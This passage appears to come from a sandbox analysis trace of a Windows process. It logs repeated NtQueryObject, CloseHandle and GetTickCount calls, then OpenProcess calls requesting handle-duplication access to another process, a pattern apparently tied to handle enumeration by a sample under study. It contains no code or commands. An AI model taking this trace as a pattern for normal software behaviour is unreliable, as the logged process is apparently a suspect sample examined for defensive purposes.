(in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] CloseHandle (hObject=0x1b8) returned 1 [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] CloseHandle (hObject=0x1b8) returned 1 [0114.204] GetTickCount () returned 0xe8672d [0114.205] GetTickCount () returned 0xe8672d [0114.205] GetTickCount () returned 0xe8672d [0114.205] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.205] GetTickCount () returned 0xe8672d [0114.205] GetTickCount () returned 0xe8672d [0114.205] CloseHandle (hObject=0x1b8) returned 1 [0114.205] GetTickCount () returned 0xe8672d [0114.205] GetTickCount () returned 0xe8672d [0114.205] GetTickCount () returned 0xe8672d [0114.205] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.205] GetTickCount () returned 0xe8672d [0114.205] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.205] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.206] GetTickCount () returned 0xe8672d [0114.206] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.206] GetTickCount () returned 0xe8672d [0114.207] CloseHandle (hObject=0x1b8) returned 1 [0114.207] GetTickCount () returned 0xe8672d [0114.207] GetTickCount () returned 0xe8672d [0114.207] GetTickCount () returned 0xe8672d [0114.207] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.207] GetTickCount () returned 0xe8672d [0114.207] GetTickCount () returned 0xe8672d [0114.207] CloseHandle (hObject=0x1b8) returned 1 [0114.207] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] CloseHandle (hObject=0x1b8) returned 1 [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] GetTickCount () returned 0xe8672d [0114.208] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.209] GetTickCount () returned 0xe8672d [0114.209] GetTickCount () returned 0xe8672d [0114.209] CloseHandle (hObject=0x1b8) returned 1 [0114.209] GetTickCount () returned 0xe8672d [0114.209] GetTickCount () returned 0xe8672d [0114.209] GetTickCount () returned 0xe8672d [0114.209] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.209] GetTickCount () returned 0xe8672d [0114.209] GetTickCount () returned 0xe8672d [0114.209] CloseHandle (hObject=0x1b8) returned 1 [0114.209] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8672d [0114.210] CloseHandle (hObject=0x1b8) returned 1 [0114.210] GetTickCount () returned 0xe8672d [0114.210] GetTickCount () returned 0xe8673d [0114.210] GetTickCount () returned 0xe8673d [0114.210] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] CloseHandle (hObject=0x1b8) returned 1 [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] CloseHandle (hObject=0x1b8) returned 1 [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] GetTickCount () returned 0xe8673d [0114.211] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.212] CloseHandle (hObject=0x1b8) returned 1 [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.212] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.212] CloseHandle (hObject=0x1b8) returned 1 [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.212] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.213] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] CloseHandle (hObject=0x1b8) returned 1 [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] GetTickCount () returned 0xe8673d [0114.214] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.214] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] CloseHandle (hObject=0x1b8) returned 1 [0114.215] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.215] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] CloseHandle (hObject=0x1b8) returned 1 [0114.215] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] GetTickCount () returned 0xe8673d [0114.215] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.215] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] CloseHandle (hObject=0x1b8) returned 1 [0114.216] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.216] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] CloseHandle (hObject=0x1b8) returned 1 [0114.216] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] GetTickCount () returned 0xe8673d [0114.216] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.216] GetTickCount () returned 0xe8673d [0114.217] GetTickCount () returned 0xe8673d [0114.217] CloseHandle (hObject=0x1b8) returned 1 [0114.217] GetTickCount () returned 0xe8673d [0114.217] GetTickCount () returned 0xe8673d [0114.217] GetTickCount () returned 0xe8673d [0114.217] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.217] GetTickCount () returned 0xe8673d [0114.217] GetTickCount () returned 0xe8673d [0114.217] CloseHandle (hObject=0x1b8) returned 1 [0114.217] GetTickCount () returned 0xe8673d [0114.217] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.218] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.218] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.218] CloseHandle (hObject=0x1b8) returned 1 [0114.218] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.218] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.218] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.218] CloseHandle (hObject=0x1b8) returned 1 [0114.218] GetTickCount () returned 0xe8673d [0114.218] GetTickCount () returned 0xe8673d [0114.219] GetTickCount () returned 0xe8673d [0114.219] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.219] GetTickCount () returned 0xe8673d [0114.219] GetTickCount () returned 0xe8673d [0114.219] CloseHandle (hObject=0x1b8) returned 1 [0114.219] GetTickCount () returned 0xe8673d [0114.219] GetTickCount () returned 0xe8673d [0114.219] GetTickCount () returned 0xe8673d [0114.219] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.219] GetTickCount () returned 0xe8673d [0114.219] GetTickCount () returned 0xe8673d [0114.219] CloseHandle (hObject=0x1b8) returned 1 [0114.219] GetTickCount () returned 0xe8673d [0114.220] GetTickCount () returned 0xe8673d [0114.220] GetTickCount () returned 0xe8673d [0114.220] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.220] GetTickCount () returned 0xe8673d [0114.220] GetTickCount () returned 0xe8673d [0114.220] CloseHandle (hObject=0x1b8) returned 1 [0114.220] GetTickCount () returned 0xe8673d [0114.220] GetTickCount () returned 0xe8673d [0114.220] GetTickCount () returned 0xe8673d [0114.220] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.223] GetTickCount () returned 0xe8673d [0114.223] GetTickCount () returned 0xe8673d [0114.224] CloseHandle (hObject=0x1b8) returned 1 [0114.224] GetTickCount () returned 0xe8673d [0114.224] GetTickCount () returned 0xe8673d [0114.224] GetTickCount () returned 0xe8673d [0114.224] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.224] GetTickCount () returned 0xe8673d [0114.224] GetTickCount () returned 0xe8673d [0114.224] CloseHandle (hObject=0x1b8) returned 1 [0114.224] GetTickCount () returned 0xe8673d [0114.224] GetTickCount () returned 0xe8673d [0114.224] GetTickCount () returned 0xe8673d [0114.225] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.225] CloseHandle (hObject=0x1b8) returned 1 [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.225] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.225] CloseHandle (hObject=0x1b8) returned 1 [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.225] GetTickCount () returned 0xe8673d [0114.226] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.226] GetTickCount () returned 0xe8673d [0114.226] GetTickCount () returned 0xe8673d [0114.226] CloseHandle (hObject=0x1b8) returned 1 [0114.226] GetTickCount () returned 0xe8674c [0114.226] CloseHandle (hObject=0x198) returned 1 [0114.226] GetTickCount () returned 0xe8674c [0114.226] GetTickCount () returned 0xe8674c [0114.226] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.226] GetTickCount () returned 0xe8674c [0114.226] GetTickCount () returned 0xe8674c [0114.226] CloseHandle (hObject=0x1b8) returned 1 [0114.226] GetTickCount () returned 0xe8674c [0114.226] CloseHandle (hObject=0x198) returned 1 [0114.226] GetTickCount () returned 0xe8674c [0114.227] GetTickCount () returned 0xe8674c [0114.227] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.227] GetTickCount () returned 0xe8674c [0114.227] GetTickCount () returned 0xe8674c [0114.227] CloseHandle (hObject=0x1b8) returned 1 [0114.227] GetTickCount () returned 0xe8674c [0114.227] CloseHandle (hObject=0x198) returned 1 [0114.227] GetTickCount () returned 0xe8674c [0114.227] GetTickCount () returned 0xe8674c [0114.227] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.227] GetTickCount () returned 0xe8674c [0114.227] GetTickCount () returned 0xe8674c [0114.228] CloseHandle (hObject=0x1b8) returned 1 [0114.228] GetTickCount () returned 0xe8674c [0114.228] CloseHandle (hObject=0x198) returned 1 [0114.228] GetTickCount () returned 0xe8674c [0114.228] GetTickCount () returned 0xe8674c [0114.228] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.228] GetTickCount () returned 0xe8674c [0114.228] GetTickCount () returned 0xe8674c [0114.228] CloseHandle (hObject=0x1b8) returned 1 [0114.228] GetTickCount () returned 0xe8674c [0114.228] CloseHandle (hObject=0x198) returned 1 [0114.228] GetTickCount () returned 0xe8674c [0114.228] GetTickCount () returned 0xe8674c [0114.228] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.228] GetTickCount () returned 0xe8674c [0114.228] GetTickCount () returned 0xe8674c [0114.229] CloseHandle (hObject=0x1b8) returned 1 [0114.229] GetTickCount () returned 0xe8674c [0114.229] CloseHandle (hObject=0x198) returned 1 [0114.229] GetTickCount () returned 0xe8674c [0114.229] GetTickCount () returned 0xe8674c [0114.229] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.229] GetTickCount () returned 0xe8674c [0114.229] GetTickCount () returned 0xe8674c [0114.229] CloseHandle (hObject=0x1b8) returned 1 [0114.229] GetTickCount () returned 0xe8674c [0114.229] CloseHandle (hObject=0x198) returned 1 [0114.229] GetTickCount () returned 0xe8674c [0114.229] GetTickCount () returned 0xe8674c [0114.229] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.229] GetTickCount () returned 0xe8674c [0114.229] GetTickCount () returned 0xe8674c [0114.230] GetTickCount () returned 0xe8674c [0114.230] CloseHandle (hObject=0x198) returned 1 [0114.230] GetTickCount () returned 0xe8674c [0114.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.239] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.254] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.254] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.255] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.256] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.328] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.337] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.421] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.421] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.426] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.473] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.474] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.481] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.481] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.488] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.490] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.491] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.491] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.491] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.491] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.493] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.493] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.494] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.499] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.501] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.516] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.516] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.530] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.530] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.530] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.530] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.530] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.530] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.530] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess 